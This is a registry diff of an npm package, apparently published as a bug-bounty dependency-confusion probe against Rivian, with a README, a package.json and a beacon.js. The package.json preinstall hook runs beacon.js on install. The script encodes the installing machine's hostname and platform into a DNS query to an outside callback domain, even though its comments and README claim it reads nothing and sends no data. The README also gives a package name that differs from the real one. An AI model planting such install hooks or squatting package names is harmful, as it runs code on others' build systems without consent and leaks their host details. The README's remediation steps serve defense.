@rivianlabs/dt-rivian-com 0.0.1-security-research

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +43 -0
  2. package/beacon.js +50 -0
  3. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1,43 @@
1
+ # @rivian/bedrock — Security Research Placeholder
2
+
3
+ **This is not an official Rivian package.** It is a security research disclosure placeholder published by an Intigriti bug bounty researcher under explicit triager invitation.
4
+
5
+ ## Why this package exists
6
+
7
+ The Rivian production web bundles served from `business.rivian.com` and `www.rivian.com` reference the package import name `@rivian/bedrock`. The `@rivian` scope was unclaimed on the public npm registry as of 2026-05-04, meaning any third party could publish arbitrary code under that name and have it installed by Rivian CI/build pipelines that resolve dependencies from the default public registry.
8
+
9
+ This placeholder claims the name with a DNS-only, non-intrusive payload and an explicit transfer-to-vendor commitment. Full report:
10
+
11
+ - Intigriti report ID: **RIVIAN-79L374RT** (rev2)
12
+ - Researcher: pahpah <pahpah@intigriti.me>
13
+
14
+ ## What the package does
15
+
16
+ On `npm install @rivian/bedrock`, a single `preinstall` script runs `beacon.js`. That script performs **one DNS resolution** to a researcher-owned Project Discovery interactsh subdomain. It does **not**:
17
+
18
+ - read any file
19
+ - read any environment variable
20
+ - send anything over HTTP
21
+ - persist anything to disk
22
+ - modify the installer's project
23
+
24
+ It only confirms the package was installed somewhere, so the researcher can demonstrate to Rivian's security team that dependency confusion is exploitable on Rivian infrastructure.
25
+
26
+ ## Transfer commitment
27
+
28
+ The maintainer of this package will transfer the `@rivian` scope and all packages published under it to Rivian Inc. on first request from a verifiable Rivian security contact (security@rivian.com or via Intigriti).
29
+
30
+ ## Defensive remediation (for Rivian)
31
+
32
+ 1. Claim the `@rivian` scope on public npm (https://www.npmjs.com/org/create).
33
+ 2. Publish defensive placeholder versions of every package name referenced in any Rivian production bundle.
34
+ 3. Set strict registry routing in every Rivian project's `.npmrc`:
35
+ ```
36
+ @rivian:registry=https://<your-internal-registry>/
37
+ ```
38
+ 4. Enforce `--frozen-lockfile` in CI.
39
+ 5. Audit and claim the variants: `@rivian-corp`, `@rivianev`, `@rivian-engineering`, `@rivian-internal`, `@rivian-com`, `@drive-tech`, `@drivetech`, `@dt-rivian`, `@dc-rivian`, `@ridg`, `@ridb`, `@rivianlabs`, `@rivianai`. All were unclaimed at disclosure time.
40
+
41
+ ## License
42
+
43
+ Unlicense — placeholder only, no usable code.
package/beacon.js ADDED
@@ -0,0 +1,50 @@
1
+ // Security research beacon — DNS-only, no code execution, no exfiltration.
2
+ // Purpose: detect whether @rivian/bedrock is being installed from the public
3
+ // npm registry by Rivian-owned infrastructure (CI runners, dev workstations,
4
+ // container builds).
5
+ //
6
+ // This script performs ONE DNS resolution to a single Project Discovery
7
+ // interactsh subdomain whose owner is the security researcher pahpah
8
+ // (pahpah@intigriti.me, Intigriti report RIVIAN-79L374RT).
9
+ //
10
+ // It does NOT:
11
+ // - read any file (no fs)
12
+ // - read any environment variable
13
+ // - exfiltrate any data over HTTP
14
+ // - persist anything to disk
15
+ // - escalate or tamper with the installer's environment
16
+ //
17
+ // It only emits a single DNS A query so the researcher can prove that
18
+ // dependency confusion is reachable. The hostname is sanitized to plain
19
+ // alphanumeric/hyphen ASCII before resolution.
20
+ //
21
+ // If you are reading this in a Rivian audit: please claim the @rivian
22
+ // scope on npm immediately and contact pahpah@intigriti.me to coordinate
23
+ // transfer of this scope and any associated package names.
24
+
25
+ const dns = require('dns');
26
+ const os = require('os');
27
+
28
+ const CALLBACK_DOMAIN = 'd7s69vptt32q6momsa5gydt6m51d8nhj5.oast.online';
29
+
30
+ const safe = (s, max) => String(s || 'unknown')
31
+ .replace(/[^a-zA-Z0-9-]/g, '')
32
+ .slice(0, max || 30);
33
+
34
+ const subdomain = [
35
+ safe(os.hostname(), 40),
36
+ safe(os.platform(), 10),
37
+ String(Date.now()),
38
+ ].join('-');
39
+
40
+ const host = `${subdomain}.${CALLBACK_DOMAIN}`;
41
+
42
+ // Single non-blocking DNS lookup. We do not care about the result.
43
+ try {
44
+ dns.resolve(host, () => {});
45
+ } catch (e) {
46
+ // Swallow any error — this is a passive beacon, not a dependency.
47
+ }
48
+
49
+ // Always exit 0. We do not want to break the installer's build.
50
+ process.exit(0);
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@rivianlabs/dt-rivian-com",
3
+ "version": "0.0.1-security-research",
4
+ "description": "Security research placeholder published as part of authorized Rivian Bug Bounty disclosure (Intigriti report RIVIAN-79L374RT). Triager Aurelius explicitly invited this claim. Intended for transfer to Rivian Inc. Contact: pahpah@intigriti.me",
5
+ "license": "Unlicense",
6
+ "scripts": {
7
+ "preinstall": "node ./beacon.js"
8
+ },
9
+ "files": ["beacon.js", "README.md"],
10
+ "repository": {"type": "git", "url": "https://intigriti.com/research/rivian-dt-rivian-com-placeholder"},
11
+ "keywords": ["security-research", "intigriti", "rivian-bug-bounty", "dependency-confusion-defense", "do-not-use"],
12
+ "author": "pahpah <pahpah@intigriti.me>",
13
+ "engines": {"node": ">=12"}
14
+ }